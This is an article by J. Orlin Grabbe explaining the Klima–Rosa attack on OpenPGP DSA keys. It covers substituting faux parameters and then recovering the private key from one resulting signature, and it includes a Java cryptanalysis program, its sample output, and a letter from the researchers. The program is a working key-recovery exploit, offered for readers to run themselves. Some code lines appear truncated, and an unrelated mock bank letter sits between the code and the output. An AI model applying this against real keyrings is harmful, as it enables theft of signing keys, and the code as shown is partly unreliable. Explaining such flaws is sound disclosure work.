The DSA Flaw in OpenPGP

by J. Orlin Grabbe

This article is about something basic, not something esoteric. Recently a problem was found in Open PGP, relating to both the Digital Signature Algorithm (DSA) and to RSA. You don't have to care about OpenPGP to care about this problem, because the problem is much more basic to cryptography and your privacy.

This article explains the flaw, and gives you a Java cryptanalysis program so you can see and exploit it for yourself. Having actual code and program sample output is especially important as some may have problems following the mathematics of the exploit.

The security of many things in cryptography, including, for example, digital cash, is related to the "discrete logarithm problem". This is a "hard" problem, and computer security and financial security are sometimes based on the fact no one has found an easy way to find discrete logarithms. But the forces of tyranny are not always stupid. They prefer to substitute easy problems for hard problems.

In a recent article ( I pointed out that the FBI got a court order to install a keystroke logger on Nicky Scarfo, Jrs' computer because they couldn't break Scarfo's PGP-encrypted files. It was easier to steal Scarfo's passphrase than to break his encryption.

Now two Czech mathematicians have shown an easy way to tamper with DSA signatures by tampering with the parameters used in the signature. The details will be reviewed later but DSA signatures use three parameters p, g, q along with a public key y and a private key x. The method substitutes a faux p' and g' for the original p and g (see Vlastimil Klima and Tomas Rosa, "Attack on Private Signature Keys of the OpenPGP format, PGP programs and other applications compatible with OpenPGP". A copy of this paper in .pdf format can be found here.)

Substituting the faux p' and g' is easy in the current OpenPGP format because there is no check on the validity of the parameters. So if you have a hex editor and access to a person's secret key ring, this part is trivial. After that, all you have to do is get the person to sign something and grab that, and then you can back out the person's private key x. This is possible, because with the faux parameters the discrete logarithm problem is no longer hard. (But you still have to do the calculations; that's why I'm writing this article.)

The lesson is simple: if you have access to DSA parameters and can alter them, and then obtain a message signed with the faux parameters, you can steal a person's private key. This has implications beyond PGP or the US government's Digital Signature Algorithm, because DSA-type mathematics appears in many other contexts.

A Brief Review of DSA

The Java program below illustrates DSA using the Cryptix cryptography library (chiefly the DSA signature function). Now, technically, the exploit won't work with the Cryptix DSA signature function, because Cryptix does verify the parameters, at least to a certain extent. So I show how to calculate the same signature outside the Cryptix DSA signature function. The point of all this is to give a known and unambiguous context for doing the proper calculations, before we start with the faux parameters and faux signatures and the theft of secret keys.

Those unfamiliar with the Cryptix library can review my Java encryption page (

Suppose you want to DSA-sign a message. You are given DSA parameters g, p, q. You take a hash h of the message. Then you produce two numbers (r and s) that are the signature.

First, produce a random number k, 0<k<q, and calculate:

r = (gk mod p) mod q.

Now calculate the inverse of k:

kInv = k-1 mod q. (This is the number such that k*kInv = 1 mod q.)

Next, produce the number s, using the hash h and your secret key x:

s = [kInv * (h + x*r) ] mod q.

The two numbers (r,s) are the signature. To verify the signature, you start with the received message and the signature (r,s). You take the hash h' of the received message, then go through a series of calculations that begin with s. If the end result is r, the signature verifies. If the end result is some number other than r, the signature is not valid.

The default parameters g, p, q, for Cryptix and the Sun Java libraries are (for 1024-bit encryption, and written in hexadecimal notation):

g =

F7E1A085D69B3DDE CBBCAB5C36B857B9 7994AFBBFA3AEA82 F9574C0B3D078267
5159578EBAD4594F E67107108180B449 167123E84C281613 B7CF09328CC8A6E1
3C167A8B547C8D28 E0A3AE1E2BB3A675 916EA37F0BFA2135 62F1FB627A01243B
CCA4F1BEA8519089 A883DFE15AE59F06 928B665E807B5525 64014C3BFECF492A

p =

FD7F53811D751229 52DF4A9C2EECE4E7 F611B7523CEF4400 C31E3F80B6512669
455D402251FB593D 8D58FABFC5F5BA30 F6CB9B556CD7813B 801D346FF26660B7
6B9950A5A49F9FE8 047B1022C24FBBA9 D7FEB7C61BF83B57 E7C6A8A6150F04FB
83F6D3C51EC30235 54135A169132F675 F3AE2B61D72AEFF2 2203199DD14801C7

q = 9760508F15230BCC B292B982A2EB840B F0581CF5

Here g and p have 1024 bits, while q has 160 bits. They fulfill the requirement that

gq = 1 mod p,

and no lower power of g equals 1 mod p. (That is, g is a "generator" and q is the "order" of g with respect to p.) Necessarily, also,

p = 1 mod q.

The faux parameters the Czech mathematicians substitute for g and p are these:

g' = 31AC85291FF814E6 25E4B88C8C5047A7 DB2F0E45

p' = 5380000000000000 0000000000000000 00000001

Here p' has 159 bits, while g' has 158 bits.

Now, the reason this substitution won't work in the Cryptix DSA signature function is that the function checks to see if the number of bits in p is at least 512. So it won't accept p'. So in the program I calculate the signatures and verification independently, to get around this restriction, but only after demonstrating that these signing and verification procedures duplicate those in Cryptix.

Also, the DSA signature produced with g', p'—denote it (r',s')—is not a valid signature. That is, taking a hash of the (unaltered) message, and then starting with s' and doing the correct calculations will not give you back r'. But this is not important, because the only reason for the false signature is to steal the secret key--and not to masquerade as a valid signature.

How to Steal the Secret Key

The first thing to note about p' is the following:

p' = t*2s + 1,

where t = 167 and s = 151. Now, go back and review the DSA signature procedure. You first start with a random k, 0 < k < q.

The first significant thing about the form p' takes is that, since s = 151, you can back out 151 bits of k mod 2s by looking at quadratic residues. Next, you need do not more than 167 calculations to determine the value of k mod t. (Well, that's approximately true. You don't actually determine a single k, but rather one of 4 possible k's.)

Then, using the Chinese Remainder Theorem, you can determine k from k mod 2s and k mod t.

The other three k's are determined as k+(p'-1), k+2*(p'-1), k+3*(p'-1).

Once you've determined k, you just reverse the DSA signature mathematics and solve for x (one of four possible x's). The correct x, of course, is the one that gives the known public key y = gx mod p.

In the sample computer output below, the 151 binary bits of k are shown as:

k mod 2s =


which translates into hexadecimal as:

k mod 2s = 550831C9706488CD 629EA27210913A57 CC706F

Then after 62 calculations, we find the value of

k mod t = 62.

The Chinese Remainder Theorem then gives us for the value of k:

k = 0DD50831C9706488 CD629EA27210913A 57CC706F.

However, calculating x and then y from this value of k does not yield the right public key.

So next we try k+(p'-1):

k+(p'-1) = 61550831C9706488 CD629EA27210913A 57CC706F,

which yields the correct value for the private key x:

x = 805C2D4BF743063C ABF060AD48E04BD6 813DA8B6.

Beware [?] of Figure 3

The tricky part of the calculation is in determining k mod 2s; namely, the 151 bits, bit by bit. This is the only part of the attack for which Klima and Rosa provide pseudocode. However, their pseudocode (in Figure 3 in their Appendix) is erroneous (perhaps deliberately so).[Note added: Perhaps the error is mine: see the letter from Tomas Rosa and Vlastimil Klima following this article and preceding the Java source code. In any case . . .] The proper calculations are given in the code in my program below, namely the lines:

// now set up routine to get the bits of k by looking at quadratic residues
		p = pprime;
		g = gprime;
		BigInteger val, ival, TwoPower, PminusOne;
		TwoPower = One;
        	v = p.subtract(One);
		Bv = Zero;
		PminusOne = p.subtract(One);
		for(i=1;i<=151;i++) {
			v = v.divide(Two); 
			yk = r.modPow(v,p);
			if(yk.compareTo(One)==0) wk[i]= 0;
				else wk[i]=1;
			Ij = new Integer(wk[i]);
			w = Ij.toString();
			Bj = new BigInteger(w);
			Bj = Bj.multiply(TwoPower);
			Bv = Bv.add(Bj);
			Ba = PminusOne.subtract(Bv);
			f = g.modPow(Ba,p);
			TwoPower = TwoPower.multiply(Two);
	      for(i=151;i>=1;i--) output.print(wk[i]);

General Comments on the Program

Each time the Java program is run, it uses the same parameters p, g, q, but produces a different private key x and public key y. Both the private key x and the public key y are printed out for reference. (This is the same "unknown" private key which the program finds later through the faux signature.)

The program reads in a file called data, does a SHA1 hash of the file, and signs this hash, producing the signature (r,s). Later on, the program uses the faux p', g' to sign this hash value again. That is, the "message" that is captured after the faux parameters are substituted is just the same hash value as before, but this time signed with the faux parameters to produce the faux signature (r', s').

The SHA1 hash of the sample file data is

h = 1A01B56EB33FA84A 39EEDDD927977726 38331E94.

This is the hash value under Windows, which includes an end-of-file marker. (For a listing of the bytes being hashed, see my "Digital Signatures Illustrated" ( A Linux file will hash differently.

The program generates its own random bytes for the DSA signature, including the faux signature, which in the sample given are

61550831C9706488 CD629EA27210913A 57CC706F

This is the second of the four possible values for k later backed out in the cryptanalysis section. Since the associated calculated value for x gives the correct public key y, the program stops, after printing out the real value of x (created in the early part of the program) for comparison.

Comment on Java and Cryptix Versions

The program compiles and runs without errors. I am using Cryptix 3.1 and running Java 1.2.2. Most of the programs on my Java crypto page were written under Java 1.1.7b, but basically run under Java 1.2.2 with no changes, provided you run the programs with oldjava.exe. (Otherwise, in some cases, there are conflicts with the module, or something similar.)

That is, to compile and run under Java 1.2.2 you would enter the commands:

oldjava testDES

The current program, however, was written under Java 1.2.2 and compiles and runs in the normal fashion:

java pgp_dsa_flaw data

where data is the name of the input file to be signed.

A text copy of the file data may be found here. A text file of the java program (listed below on this html page) may be found here. Sample output is given after these listings.

Czech Mathematicians Respond

Subject: RE: Java cryptanalysis program: the DSA flaw in OpenPGP
From: Rosa Tomas 
Date: Thu, 12 Apr 2001 10:49:35 +0200
To: "''" 
CC: "'orlingrabbe'" 

Dear Mr. Grabbe, thank you for your interest in our work. Your comment and program are both excellent.

What we would like to ask about is your warning about error(s) in our paper in Figure 3. We have checked our algorithm once again and we didn't find any bug there. Moreover our technician have written program used to test our attack just in the way according to the Figure 3. And it worked.

One and only thing, that could be misleading is at the line 4. Note that the command r = r*f mod p belongs only to the else-part of the if-then-else statement. The line 4 at our Figure 3 is if (y=1) then wi=0 else wi=1; r=r*f mod p Because it is pseudocode and it is on one line it is read as if (y=1) then wi=0 else {wi=1; r=r*f mod p}. It is explained in our article, too. You wrote the loop for(i=1;i<=151;i++) correctly without our condition if-then-else and in fact you do r=r*f every time. But in the case wi=0 it holds in your program that f=1, thus r=r*f is not necessary to compute.

We would very appreciate some other comments on our algorithm. And we are pleased that you implemented it and acknowledged it independently. Thank you very much for your work.

Note, that we did not publish the implementation of the algorithm, to give NAI the time to release the patch.

According to the page 4 of your web paper we also note that we will release the updated version of our paper soon. There will be included slight modification of the attack on DSA, which allows us to use the p' in proper length (eg. 512-1024 bits; from the mathematical point of view this modification is not very hard, but practically it seems to be useful).

with the best regards Tomas Rosa and Vlastimil Klima

-----Original Message----- From: orlingrabbe [] Sent: Wednesday, April 11, 2001 2:08 AM To: Subject: Java cryptanalysis program: the DSA flaw in OpenPGP

I have written a Java cryptanalysis program and article for the Laissez Faire City Times regarding the recently announced DSA flaw in OpenPGP. The program does the calculations to back out the (secret) private key.

An advance copy of the article and program is available at



import java.lang.*;
import java.math.*;
import cryptix.util.core.BI;
import cryptix.util.core.Hex;
import cryptix.provider.key.*;

class pgp_dsa_flaw {

    public static void main(String[] args) {

	try {
		BigInteger p, q, g, y, x, r, s, kk, z;
		BigInteger pprime, gprime, pstore, gstore;
		String w;

		FileOutputStream outFile = new FileOutputStream("Flaw.out");
		          PrintStream output = new PrintStream(outFile);

		g = new 
		w = cryptix.util.core.BI.dumpString(g);
		output.println("g = " + w);
		gstore = g;

		q = new BigInteger("9760508f15230bccb292b982a2eb840bf0581cf5", 16);
		w = cryptix.util.core.BI.dumpString(q);
		output.println("q = " + w);

		p = new 
		w = cryptix.util.core.BI.dumpString(p);
		output.println("p = " + w);
		pstore = p;

		pprime = new BigInteger("5380000000000000000000000000000000000001",16);                 
		w = cryptix.util.core.BI.dumpString(pprime);
		output.println("pprime = " + w);

		gprime = new BigInteger("31ac85291ff814e625e4b88c8c5047a7db2f0e45",16);                 
		w = cryptix.util.core.BI.dumpString(gprime);
		output.println("gprime = " + w);

		//calculate random k
		SecureRandom ran = new SecureRandom();
		byte[] bb = new byte[20];

		w = cryptix.util.core.Hex.dumpString(bb);
		output.println("20 random bytes: " + w);

		//read in a file and calculate the message digest (hash)
	  	MessageDigest md = MessageDigest.getInstance("SHA-1");
        	FileInputStream fis = new FileInputStream(args[0]);
		byte b;
        	while (fis.available() != 0) {
        		b = (byte);

		byte[] hash = md.digest();
		w = cryptix.util.core.Hex.dumpString(hash);
		output.println("the SHA-1 hash of " + args[0] + " is " + w);

            // generate a DSA key pair
            KeyPairGenerator keyGen = KeyPairGenerator.getInstance("DSA");

 		keyGen.initialize(1024, ran);
            KeyPair pair = keyGen.generateKeyPair();
            // create a DSA Signature object
            Signature dsa = Signature.getInstance("SHA/DSA"); 

		// cast as DSAKey in order to access g, p, q directly
		DSAKey priv2 = (DSAKey) pair.getPrivate();
		DSAParams params = priv2.getParams();
		g = (BigInteger) params.getG();
		w = cryptix.util.core.BI.dumpString(g);
		output.println("generator g = " + w);
		p = (BigInteger) params.getP();
		w = cryptix.util.core.BI.dumpString(p);
		output.println("prime p = " + w);
		q = (BigInteger) params.getQ();
		w = cryptix.util.core.BI.dumpString(q);
		output.println("order q of group G(q) = " + w);
		// check that the parameters are valid: does p mod q = 1?
		z = p.mod(q);
		w = cryptix.util.core.BI.dumpString(z);
 		output.println("p mod q = " + w);
		// check that the parameters are valid: does g^q mod p = 1?
		z = g.modPow(q,p);
		w = cryptix.util.core.BI.dumpString(z);
 		output.println("g^q mod p = " + w);

		// cast as DSAPrivateKey in order to access the private key x directly
            DSAPrivateKey priv = (DSAPrivateKey) pair.getPrivate();
		x = (BigInteger) priv.getX();
		String sx = cryptix.util.core.BI.dumpString(x);
		output.println(" ");
		output.println("private key x = " + sx);

            // cast as DSAPublicKey in order to access  the public key y directly 
            DSAPublicKey pub = (DSAPublicKey) pair.getPublic();
		y = (BigInteger) pub.getY();
		String sy = cryptix.util.core.BI.dumpString(y);
		output.println(" ");
		output.println("public key y = " + sy);

		// check the validity of the public-private key relationship
		z = g.modPow(x,p);
		w = cryptix.util.core.BI.dumpString(z);
		output.println(" ");
		output.println("Note here that the value of ");
 		output.println("g^x mod p = " + w);
		output.println("which verifies the public key y.");		

         	// initialize the Signature object for signing 

         	//update and sign the data
		//independently check the message digest
	  	md = MessageDigest.getInstance("SHA-1");
        	fis = new FileInputStream(args[0]);
        	while (fis.available() != 0) {
        		b = (byte);

		hash = md.digest();
		w = cryptix.util.core.Hex.dumpString(hash);
		output.println("the SHA-1 hash of " + args[0] + " is " + w);

        	// now that all the data to be signed has been read in, sign it 
		BigInteger sig1;
        	byte[] sig = dsa.sign();
		w = cryptix.util.core.Hex.dumpString(sig);
		output.println("the DSA signature (byte array) is " + w);
		sig1 = new BigInteger(sig);
		w = cryptix.util.core.BI.dumpString(sig1);
		output.println("the DSA signature (BigInteger) is " + w);

        	// extract the first part of signature 
		BigInteger Bfirst, Bsecond;
	  	byte[] bf = new byte[20];
	  	int i=0, j=0, k=0;

		// check if bytes are 0214h or 0215h and adjust accordingly
		// note that BigInteger from bytes must have positive sign
		if(sig[3]==21) j=1;
		if((j==0)&&(sig[25]==21)) k=1;
		else if((j==1)&&(sig[26]==21)) k=1;
		output.println(" j = " + j + " k = " + k);
		output.println(" sig[3] = " + sig[3] + " sig[25] = " + sig[25] + " sig[26] 
                    = " + sig[26]);
	  	for(i=4+j;i<24+j;i++) bf[i-4-j] = sig[i];
        	Bfirst = new BigInteger(bf);
		if(j==1) {byte[] bg = new byte[21];
				    bg[0] = 0;
				    for(i=1;i<21;i++) bg[i]=bf[i-1];
				    Bfirst = new BigInteger(bg);

		r = Bfirst;
		w = cryptix.util.core.BI.dumpString(r);
        	output.println("The first number in signature = " + w);
        	output.println(" ");

        	// extract the second part of signature 
	  	byte[] bs = new byte[20];
	  	for(i=26+j+k;i<46+j+k;i++) bs[i-26-j-k] = sig[i];
        	Bsecond = new BigInteger(bs);
		if(k==1) {byte[] bt = new byte[21];
				    bt[0] = 0;
				    for(i=1;i<21;i++) bt[i]=bs[i-1];
				    Bsecond = new BigInteger(bt);
		s = Bsecond;
       	w = cryptix.util.core.BI.dumpString(s);
        	output.println("The second number in signature = " + w);
        	output.println(" ");

		// calculate the DSA signature (and compare)
		// needed are the hash of the message, first and second
		//   parts of signature, public key y, group generator g
		BigInteger Bhash, Zero, Bfirinv, Bsecinv, Bu1, Bu2, Ba, Bb, Bt, Bv;
		Zero = new BigInteger("0");
		Bhash = new BigInteger(hash);

		// note that verification starts with the second number in the signature, 
        // does some calculations, and if the result is the first number, then 
		// the verification is true
		if(Bfirst.compareTo(Zero)==-1) output.println("verify = false");
		else if (Bsecond.compareTo(Zero)==-1) output.println("verify = false");
		else {
			Bsecinv = Bsecond.modInverse(q);   
			Bu1 = Bhash.multiply(Bsecinv);
			Bu1 = Bu1.mod(q);
			Bu2 = Bfirst.multiply(Bsecinv);
			Bu2 = Bu2.mod(q);
			Ba = g.modPow(Bu1,p);
			Bb = y.modPow(Bu2,p);
			Bt = Ba.multiply(Bb);
			Bt = Bt.mod(p);
			Bv = Bt.mod(q);
			if (Bv.compareTo(Bfirst)==0) 
			output.println("verify (independent calculation) = true");
				else output.println("verify (ind calculation) = false");
        		w = cryptix.util.core.BI.dumpString(Bv);
        		output.println("verfication number is = " + w);
        		output.println(" ");

		// verify the signature using the verify function
		// initialize the Signature object for verification 

            // update and verify the data
            fis = new FileInputStream(args[0]);
            while (fis.available() != 0) {
                b = (byte);

            boolean verifies = dsa.verify(sig);
            output.println("signature verifies (verification function): " + verifies);
		    output.println(" ");

		// NOW we are ready to calculate the private key x from the signature, 
		// substituting pprime for p and gprime for g

		// first, sign something using the private (secret) key and the faux parameters
		// (in this case we'll stick with the previously calculated hash)
		// we do the signature twice, first with true parameters p, g (which will verify)
		// and next with faux parameters pprime, gprime (which will not)

		BigInteger One, Two, kinv;		
		One = new BigInteger("1");
		Two = new BigInteger("2");

		ran = new SecureRandom();
		ran.nextBytes(bb); //leave outside loop so same bytes used in each case
		w = cryptix.util.core.Hex.dumpString(bb);
		output.println("20 random bytes: " + w);
		kk = new BigInteger(bb);
		kk = kk.mod(q);
		w = cryptix.util.core.BI.dumpString(kk);
		output.println("random bytes mod q: " + w);

		for(i=0;i<2;i++) {

		if(i==1) p = pprime;
		if(i==1) g = gprime;
		r = g.modPow(kk,p);
		r = r.mod(q);

		w = cryptix.util.core.BI.dumpString(r);
        	output.println("The first number in (possibly faux) signature = " + w);
        	output.println(" ");

		kinv = kk.modInverse(q);
		s = x.multiply(r);
		s = s.add(Bhash);
		s = s.multiply(kinv);
		s = s.mod(q);

       	w = cryptix.util.core.BI.dumpString(s);
        	output.println("The second number in (possibly faux) signature = " + w);
        	output.println(" ");
		// verify that the signature works
		if(Bfirst.compareTo(Zero)==-1) output.println("verify = false");
		else if (Bsecond.compareTo(Zero)==-1) output.println("verify = false");
		else {
			Bsecinv = Bsecond.modInverse(q);   
			Bu1 = Bhash.multiply(Bsecinv);
			Bu1 = Bu1.mod(q);
			Bu2 = Bfirst.multiply(Bsecinv);
			Bu2 = Bu2.mod(q);
			Ba = g.modPow(Bu1,p);
			Bb = y.modPow(Bu2,p);
			Bt = Ba.multiply(Bb);
			Bt = Bt.mod(p);
			Bv = Bt.mod(q);
			if (Bv.compareTo(Bfirst)==0) 
			output.println("verify (independent calculation) = true");
				else output.println("verify (ind calculation) = false");
        		w = cryptix.util.core.BI.dumpString(Bv);
        		output.println("verfication number is = " + w);
        		output.println(" ");

		// now calculate the private key x from the faux signature (r,s)
		// first verify the value of pprime
		int sk=151;
		Integer Ij;
		BigInteger Btk = new BigInteger("167");
		int[] wk = new int[152];
		BigInteger f, v, yk, Hack, Bj;
		Hack = Two.pow(sk);
		Hack = Hack.multiply(Btk);
		Hack = Hack.add(One);
        	w = cryptix.util.core.BI.dumpString(Hack);
        	output.println("pprime (calculated) is = " + w);

		// now set up routine to get the bits of k by looking at quadratic residues
		p = pprime;
		g = gprime;
		BigInteger val, ival, TwoPower, PminusOne;
		TwoPower = One;
        	v = p.subtract(One);
		Bv = Zero;
		PminusOne = p.subtract(One);
		for(i=1;i<=151;i++) {
			//output.println("i = " + i);
			v = v.divide(Two); 
			//w = cryptix.util.core.BI.dumpString(v);
        		//output.println("v is = " + w);			
			yk = r.modPow(v,p);
        		//w = cryptix.util.core.BI.dumpString(yk);
        		//output.println("yk is = " + w);
			if(yk.compareTo(One)==0) wk[i]= 0;
				else wk[i]=1;
			//output.println("wk["+i+"] = " + wk[i]);
			Ij = new Integer(wk[i]);
			w = Ij.toString();
			Bj = new BigInteger(w);
			Bj = Bj.multiply(TwoPower);
			Bv = Bv.add(Bj);
			Ba = PminusOne.subtract(Bv);
        		//w = cryptix.util.core.BI.dumpString(Ba);
        		//output.println(" q - w bits (so far) is = " + w);
			f = g.modPow(Ba,p);
        		//w = cryptix.util.core.BI.dumpString(f);
        		//output.println("f is = " + w);
			TwoPower = TwoPower.multiply(Two);
			//w = cryptix.util.core.BI.dumpString(r);
        		//output.println("r is = " + w);
	      for(i=151;i>=1;i--) output.print(wk[i]);
		  output.println(" ");

		// calculate the value of w mod 2^s
		TwoPower = Two;
		if(wk[1]==1) val = One;
			else   val = Zero;
		for (i=2;i<=151;i++) {
			if(wk[i]==1) ival = One;
				else ival = Zero;
			ival = ival.multiply(TwoPower);
			TwoPower = TwoPower.multiply(Two);
			val = val.add(ival);
        	w = cryptix.util.core.BI.dumpString(val);
        	output.println("***** w mod 2^s is = " + w);

		r = Bfirst; //restore value of r, altered by loop

		// now calculate value of w mod t = j
		Hack = Two.pow(sk);
		Bu1 = r.modPow(Hack,p);
		Bu2 = g.modPow(Hack,p);
		Bv = Bu2;
        	w = cryptix.util.core.BI.dumpString(Bu1);
        	output.println("r^((p-1)/t) is = " + w);
        	w = cryptix.util.core.BI.dumpString(Bu2);
        	output.println("g^((p-1)/t) is = " + w);

		j = 1;
		if(Bu1.compareTo(One)==0) j = 0;
		else if(Bu1.compareTo(Bu2)==0) j = 1;
			else {
			while(Bu1.compareTo(Bu2)!=0) {
			Bu2 = Bu2.multiply(Bv);
			Bu2 = Bu2.mod(p);
			j = j+1; 
			//output.println("j = "+j);
	        	//w = cryptix.util.core.BI.dumpString(Bu2);
      	  	//output.println("g^((p-1)/t)*j) is = " + w);

			if(j>166) break; }}

		output.println("***** w mod t = " + j);
        	w = cryptix.util.core.BI.dumpString(Bu1);
        	output.println("r^((p-1)/t) is = " + w);
        	w = cryptix.util.core.BI.dumpString(Bu2);
        	output.println("g^((p-1)/t)*j) is = " + w);

		// calculate w from w mod t and w mod 2^s
		Ij = new Integer(j);
		w = Ij.toString();
		Bj = new BigInteger(w);
		w = cryptix.util.core.BI.dumpString(Bj);
		output.println("j as BigInteger " + w);
		Hack = Two.pow(sk);
		Ba = Hack.modInverse(Btk);
		Bb = Bj.subtract(val);
		Bb = Bb.multiply(Ba);
		Bb = Bb.mod(Btk);
		Bv = Bb.multiply(Hack);
		Bv = Bv.add(val);
		Bv = Bv.mod(q);
   		w = cryptix.util.core.BI.dumpString(Bv);
		output.println("value of w from CRT is: " + w);

		// now determine the set K (w determines 4 possible values for k)
		Bb = p.subtract(One);
		Bu1 = r.modInverse(q);
		Integer Ii;
		for(i=0;i<4;i++) {

		Ii = new Integer(i);
		w = Ii.toString();
		Ba = new BigInteger(w);

		kk = Ba.multiply(Bb);
		kk = Bv.add(kk);

     		w = cryptix.util.core.BI.dumpString(kk);
        	output.println("possible value of k is = " + w);

		Ba = kk.multiply(s);
		Ba = Ba.subtract(Bhash);
		Ba = Ba.multiply(Bu1);
		Ba = Ba.mod(q);

     		w = cryptix.util.core.BI.dumpString(Ba);
        	output.println("possible private key (calculated) x is = " + w);

		Bu2 = gstore.modPow(Ba,pstore);
     		w = cryptix.util.core.BI.dumpString(Bu2);
        	output.println("calculated public key y from possible private key is = " 
				+ w);

		if(Bu2.compareTo(y)==0) {
		output.println("Private key found! This is it!**********************");
		output.println(" ");
			break;  } 

        	w = cryptix.util.core.BI.dumpString(x);
        	output.println(" (real) private key x actually is = " + w);

		System.out.println("File written");

        } catch (Exception e) {
            System.err.println("Caught exception " + e.toString());


Senator Hand N. Till
Washington, DC

Dear Senator:

This letter is to inform you we have
opened account no. 338907021 on your
behalf, and deposted therein a
legislative incentive payment of
$1 million.  For withdrawl, you will
need to use your password BJRGUD7693.

Yours very truly,

Arnold C. Creole
Vice President
Greater Caribbean Bank


g = Multi-Precision Integer 1024 bits long...
      sign: Positive
 magnitude: Hexadecimal dump of 128 bytes...
   0: F7E1A085D69B3DDE CBBCAB5C36B857B9 7994AFBBFA3AEA82 F9574C0B3D078267 
  32: 5159578EBAD4594F E67107108180B449 167123E84C281613 B7CF09328CC8A6E1 
  64: 3C167A8B547C8D28 E0A3AE1E2BB3A675 916EA37F0BFA2135 62F1FB627A01243B 
  96: CCA4F1BEA8519089 A883DFE15AE59F06 928B665E807B5525 64014C3BFECF492A 

q = Multi-Precision Integer 160 bits long...
      sign: Positive
 magnitude: 9760508F15230BCC B292B982A2EB840B F0581CF5

p = Multi-Precision Integer 1024 bits long...
      sign: Positive
 magnitude: Hexadecimal dump of 128 bytes...
   0: FD7F53811D751229 52DF4A9C2EECE4E7 F611B7523CEF4400 C31E3F80B6512669 
  32: 455D402251FB593D 8D58FABFC5F5BA30 F6CB9B556CD7813B 801D346FF26660B7 
  64: 6B9950A5A49F9FE8 047B1022C24FBBA9 D7FEB7C61BF83B57 E7C6A8A6150F04FB 
  96: 83F6D3C51EC30235 54135A169132F675 F3AE2B61D72AEFF2 2203199DD14801C7 

pprime = Multi-Precision Integer 159 bits long...
      sign: Positive
 magnitude: 5380000000000000 0000000000000000 00000001

gprime = Multi-Precision Integer 158 bits long...
      sign: Positive
 magnitude: 31AC85291FF814E6 25E4B88C8C5047A7 DB2F0E45

20 random bytes: 3D31A3E3FE8722EC C997BDF6286F3E90 09392CE4

the SHA-1 hash of data is 1A01B56EB33FA84A 39EEDDD927977726 38331E94

generator g = Multi-Precision Integer 1024 bits long...
      sign: Positive
 magnitude: Hexadecimal dump of 128 bytes...
   0: F7E1A085D69B3DDE CBBCAB5C36B857B9 7994AFBBFA3AEA82 F9574C0B3D078267 
  32: 5159578EBAD4594F E67107108180B449 167123E84C281613 B7CF09328CC8A6E1 
  64: 3C167A8B547C8D28 E0A3AE1E2BB3A675 916EA37F0BFA2135 62F1FB627A01243B 
  96: CCA4F1BEA8519089 A883DFE15AE59F06 928B665E807B5525 64014C3BFECF492A 

prime p = Multi-Precision Integer 1024 bits long...
      sign: Positive
 magnitude: Hexadecimal dump of 128 bytes...
   0: FD7F53811D751229 52DF4A9C2EECE4E7 F611B7523CEF4400 C31E3F80B6512669 
  32: 455D402251FB593D 8D58FABFC5F5BA30 F6CB9B556CD7813B 801D346FF26660B7 
  64: 6B9950A5A49F9FE8 047B1022C24FBBA9 D7FEB7C61BF83B57 E7C6A8A6150F04FB 
  96: 83F6D3C51EC30235 54135A169132F675 F3AE2B61D72AEFF2 2203199DD14801C7 

order q of group G(q) = Multi-Precision Integer 160 bits long...
      sign: Positive
 magnitude: 9760508F15230BCC B292B982A2EB840B F0581CF5

p mod q = Multi-Precision Integer 1 bits long...
      sign: Positive
 magnitude: 01

g^q mod p = Multi-Precision Integer 1 bits long...
      sign: Positive
 magnitude: 01
private key x = Multi-Precision Integer 160 bits long...
      sign: Positive
 magnitude: 805C2D4BF743063C ABF060AD48E04BD6 813DA8B6
public key y = Multi-Precision Integer 1022 bits long...
      sign: Positive
 magnitude: Hexadecimal dump of 128 bytes...
   0: 238165021ED0CC41 CE03A6DC15AE7FCE 33EA11AD53EF486A 25BB367BEC661019 
  32: 21DF966D13129929 DDE3C3842B96869F DC3A2A8FBDBB7AD5 2910CA10A5C257FC 
  64: 11D9F40606093C40 AA37BFE19A8D5AFF 878B2CE5215A6D7D A47E717BA7BBC380 
  96: 57CD70EDA92B4AAD 47317AB16E6E7485 89E6F5B6030BC5A9 DCC569C5923C88EF 
Note here that the value of 
g^x mod p = Multi-Precision Integer 1022 bits long...
      sign: Positive
 magnitude: Hexadecimal dump of 128 bytes...
   0: 238165021ED0CC41 CE03A6DC15AE7FCE 33EA11AD53EF486A 25BB367BEC661019 
  32: 21DF966D13129929 DDE3C3842B96869F DC3A2A8FBDBB7AD5 2910CA10A5C257FC 
  64: 11D9F40606093C40 AA37BFE19A8D5AFF 878B2CE5215A6D7D A47E717BA7BBC380 
  96: 57CD70EDA92B4AAD 47317AB16E6E7485 89E6F5B6030BC5A9 DCC569C5923C88EF 

which verifies the public key y.
the SHA-1 hash of data is 1A01B56EB33FA84A 39EEDDD927977726 38331E94

the DSA signature (byte array) is Hexadecimal dump of 46 bytes...
   0: 302C021409116D17 82C71F51A5EDB9F5 B3C798F943B9E4EB 021473BEA15C1A8D 
  32: 10B0BAFE58314C62 EB149A565506

the DSA signature (BigInteger) is Multi-Precision Integer 366 bits long...
      sign: Positive
 magnitude: Hexadecimal dump of 46 bytes...
   0: 302C021409116D17 82C71F51A5EDB9F5 B3C798F943B9E4EB 021473BEA15C1A8D 
  32: 10B0BAFE58314C62 EB149A565506

 j = 0 k = 0
 sig[3] = 20 sig[25] = 20 sig[26] = 115
The first number in signature = Multi-Precision Integer 156 bits long...
      sign: Positive
 magnitude: 09116D1782C71F51 A5EDB9F5B3C798F9 43B9E4EB
The second number in signature = Multi-Precision Integer 159 bits long...
      sign: Positive
 magnitude: 73BEA15C1A8D10B0 BAFE58314C62EB14 9A565506
verify (independent calculation) = true
verfication number is = Multi-Precision Integer 156 bits long...
      sign: Positive
 magnitude: 09116D1782C71F51 A5EDB9F5B3C798F9 43B9E4EB
signature verifies (verification function): true
20 random bytes: 61550831C9706488 CD629EA27210913A 57CC706F

random bytes mod q: Multi-Precision Integer 159 bits long...
      sign: Positive
 magnitude: 61550831C9706488 CD629EA27210913A 57CC706F

The first number in (possibly faux) signature = Multi-Precision Integer 159 bits long...
      sign: Positive
 magnitude: 493EAAD329C3C11B D47F33176AFFB7C5 1FDE5E43
The second number in (possibly faux) signature = Multi-Precision Integer 157 bits long...
      sign: Positive
 magnitude: 14DE116BA852E884 0C61594DF1BC9370 B36D8E88
verify (independent calculation) = true
verfication number is = Multi-Precision Integer 159 bits long...
      sign: Positive
 magnitude: 493EAAD329C3C11B D47F33176AFFB7C5 1FDE5E43
The first number in (possibly faux) signature = Multi-Precision Integer 157 bits long...
      sign: Positive
 magnitude: 11C87AC06A1652B3 CAFA55483B555EAD C3CD9FCE
The second number in (possibly faux) signature = Multi-Precision Integer 158 bits long...
      sign: Positive
 magnitude: 2D937BE8CD9589FE 7EC021A4A1C67604 DA453263
verify (ind calculation) = false
